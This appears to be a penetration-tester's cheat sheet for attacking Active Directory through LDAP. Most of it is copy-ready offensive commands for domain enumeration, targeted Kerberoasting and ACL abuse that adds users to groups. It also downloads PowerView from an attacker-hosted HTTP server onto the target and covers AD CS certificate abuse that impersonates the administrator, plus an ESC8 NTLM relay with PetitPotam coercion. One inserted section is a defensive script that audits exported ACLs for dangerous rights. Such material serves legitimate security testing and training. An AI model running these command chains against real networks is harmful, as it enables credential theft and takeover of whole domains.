# LDAP (389,636)

### Windapsearch

```bash
python windapsearch.py -d example.local --dc-ip 10.10.10.182 -U --full
```

### Bloodhound

```bash
# Local Attack
.\SharpHound.exe -c All

# Remote Attack
bloodhound-python -c all -ns 172.0.0.1 -d INLANEFREIGHT.LOCAL -u administrator -p 'password123' --zip
nxc ldap 192.168.1.1 -u administrator -p 'password123' --bloodhound --collection All

# Attacker
neo4j start # default credentials neo4j:neo4j
bloodhound

# Cypher queries for the neo4j console or the BloodHound raw query box
MATCH (m:Computer) RETURN m
MATCH (m:User) RETURN m
MATCH p = (c:Computer)-[:HasSession]->(m:User) RETURN p
```

### Ldap Shell

```bash
ldap_shell domain.local/administrator:password123 -dc-ip 192.168.1.2
```

### DNS Records

```bash
python dnstool.py -u 'example.com\john' -p 'pass123' --forest -a query -r '@' 192.168.1.1
```

### Targeted Kerberoasting (GenericAll)

```bash
python targetedKerberoast.py -v -d "example.local" -u "DAMUNDSEN" -p "newP@ssword2022" --dc-ip 172.16.5.5
```

### Dangerous Permissions

```powershell
# GenericAll: Full permissions on the object
# GenericWrite: Edit certain attributes on the object
# WriteOwner: Change ownership of the object
# WriteDACL: Edit the ACEs applied to the object
# AllExtendedRights: Change password, reset password, etc.
# ForceChangePassword: Reset the object's password
# Self (Self-Membership): Add ourselves to, for example, a group
# CanPSRemote: Allows WinRM
# CanRDP: Allows RDP


# GenericAll (Full Access)
net user john Password123 /domain
net group "Management Department" john /add /domain

runas /user:domain.local\john "cmd.exe"
```
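Auditing an exported ACL for the rights listed above is the defensive counterpart of this list. The following is an added example, not part of the original notes: it takes ACEs in the shape of PowerView's `Get-ObjectAcl` output (`ActiveDirectoryRights` assumed to be the integer bitmask, `ObjectType` the extended-right GUID) and flags any that grant one of the listed rights to a trustee outside the admin groups; the SIDs and DNs in the sample are constructed.

```python
# System.DirectoryServices.ActiveDirectoryRights flag values (Microsoft-documented constants)
GENERIC_ALL, GENERIC_WRITE = 0xF01FF, 0x20028   # GenericWrite = ReadControl | WriteProperty | Self
WRITE_OWNER, WRITE_DACL, EXTENDED_RIGHT, SELF = 0x80000, 0x40000, 0x100, 0x8
FLAGS = [(GENERIC_WRITE, "GenericWrite"), (WRITE_OWNER, "WriteOwner"), (WRITE_DACL, "WriteDACL")]
# Control-access-right GUIDs: User-Force-Change-Password; the null GUID means "all extended rights"
FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"
ALL_EXTENDED = "00000000-0000-0000-0000-000000000000"
# Trustees expected to hold broad rights; anyone else holding them is worth review
PRIVILEGED_RIDS = ("-512", "-519", "-518")       # Domain / Enterprise / Schema Admins
PRIVILEGED_SIDS = {"S-1-5-32-544", "S-1-5-18"}   # BUILTIN\Administrators, SYSTEM

def classify(ace):
    """Map an ACE's rights bitmask (plus ObjectType GUID) onto the right names listed above."""
    rights = ace["ActiveDirectoryRights"]
    if (rights & GENERIC_ALL) == GENERIC_ALL:
        return ["GenericAll"]                      # implies every other right below
    found = [name for mask, name in FLAGS if (rights & mask) == mask]
    if rights & EXTENDED_RIGHT:                    # which extended right depends on the ObjectType GUID
        guid = ace.get("ObjectType", ALL_EXTENDED).lower()
        if guid == ALL_EXTENDED:
            found.append("AllExtendedRights")
        elif guid == FORCE_CHANGE_PASSWORD:
            found.append("ForceChangePassword")
    if rights & SELF:
        found.append("Self")
    return found

def is_privileged(sid):
    return sid in PRIVILEGED_SIDS or sid.endswith(PRIVILEGED_RIDS)

def find_dangerous(aces):
    """(object DN, trustee SID, rights) for allow-ACEs that give listed rights to non-privileged trustees."""
    hits = []
    for ace in aces:
        if ace.get("AceType", "AccessAllowed") != "AccessAllowed" or is_privileged(ace["SecurityIdentifier"]):
            continue                               # deny ACEs and admin trustees are expected
        names = classify(ace)
        if names:
            hits.append((ace["ObjectDN"], ace["SecurityIdentifier"], names))
    return hits

# Constructed sample ACEs in the shape of Get-ObjectAcl output (SIDs and DNs invented for the example)
SAMPLE_ACES = [
    {"ObjectDN": "CN=Management Department,CN=Users,DC=domain,DC=local", "SecurityIdentifier": "S-1-5-21-1-2-3-512", "ActiveDirectoryRights": 0xF01FF},
    {"ObjectDN": "CN=Management Department,CN=Users,DC=domain,DC=local", "SecurityIdentifier": "S-1-5-21-1-2-3-1105", "ActiveDirectoryRights": 0xF01FF},
    {"ObjectDN": "CN=stephanie,CN=Users,DC=domain,DC=local", "SecurityIdentifier": "S-1-5-21-1-2-3-1106", "ActiveDirectoryRights": 0x100, "ObjectType": FORCE_CHANGE_PASSWORD},
    {"ObjectDN": "CN=svc_sql,CN=Users,DC=domain,DC=local", "SecurityIdentifier": "S-1-5-21-1-2-3-1107", "ActiveDirectoryRights": 0xC0000},
    {"ObjectDN": "CN=svc_sql,CN=Users,DC=domain,DC=local", "SecurityIdentifier": "S-1-5-21-1-2-3-1108", "ActiveDirectoryRights": 0x10},
    {"ObjectDN": "CN=stephanie,CN=Users,DC=domain,DC=local", "SecurityIdentifier": "S-1-5-21-1-2-3-1109", "ActiveDirectoryRights": 0xF01FF, "AceType": "AccessDenied"},
]
```

Running `find_dangerous(SAMPLE_ACES)` reports three ACEs: GenericAll on the group for RID 1105, ForceChangePassword on stephanie for RID 1106, and WriteOwner plus WriteDACL on svc_sql for RID 1107; the Domain Admins entry, the read-only entry and the deny ACE are skipped.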

### Powerview

```powershell
# On the attacker machine: serve PowerView over HTTP
cp /usr/share/windows-resources/powersploit/Recon/PowerView.ps1 .
python -m http.server 80

# On the target
iwr -uri http://192.168.1.2/PowerView.ps1 -Outfile PowerView.ps1
powershell -ep bypass
Import-Module .\PowerView.ps1

Get-NetDomain # Domain information
Get-NetUser # All users
Get-NetUser -SPN | select samaccountname,serviceprincipalname # SPNs
Get-NetUser | select cn # Only the cn attribute
Get-NetGroup # All groups
Get-NetComputer # Computer objects
Find-LocalAdminAccess # Do we have admin rights on any computer in the domain?
Get-NetSession -ComputerName client74 # Session check
Get-ObjectAcl -Identity stephanie # List ACEs
Find-DomainShare # List shares
Find-DomainShare -CheckShareAccess # Shares we can access
```

### AD CS Vulnerabilities

Certify.exe: <https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Certify.exe>

```bash
./Certify.exe cas

./Certify.exe find /vulnerable

certipy-ad find -u "$USER@$DOMAIN" -p "$PASSWORD" -dc-ip "$DC_IP" -vulnerable

# Request a certificate for an alternate UPN from the vulnerable template, then authenticate with the PFX
certipy-ad req -u john.doe@example.local -p password123 -upn administrator@example.local -target example.local -ca example-dc-ca -template UserAuthentication
certipy-ad auth -pfx administrator.pfx
# If auth fails with a Kerberos clock-skew error, sync the clock with the DC and retry
timedatectl set-ntp off
ntpdate dc.sequel.htb
certipy-ad auth -pfx administrator.pfx
```

### ESC8

```bash
# Relay
impacket-ntlmrelayx -t http://dc.corp.com/certsrv/certfnsh.asp -domain corp.com -smb2support --adcs --template DomainController

# Petitpotam
nxc smb 192.168.1.1 -u john -p 'pass123' -d corp.com -M coerce_plus -o LISTENER=192.168.1.2

# Get Ticket
python PKINITtools/gettgtpkinit.py corp.com/DC$ -cert-pfx DC.pfx dc.ccache
# Import Ticket
export KRB5CCNAME=dc.ccache
# Use Ticket
nxc smb 192.168.1.1 -u 'DC$' --use-kcache 
```

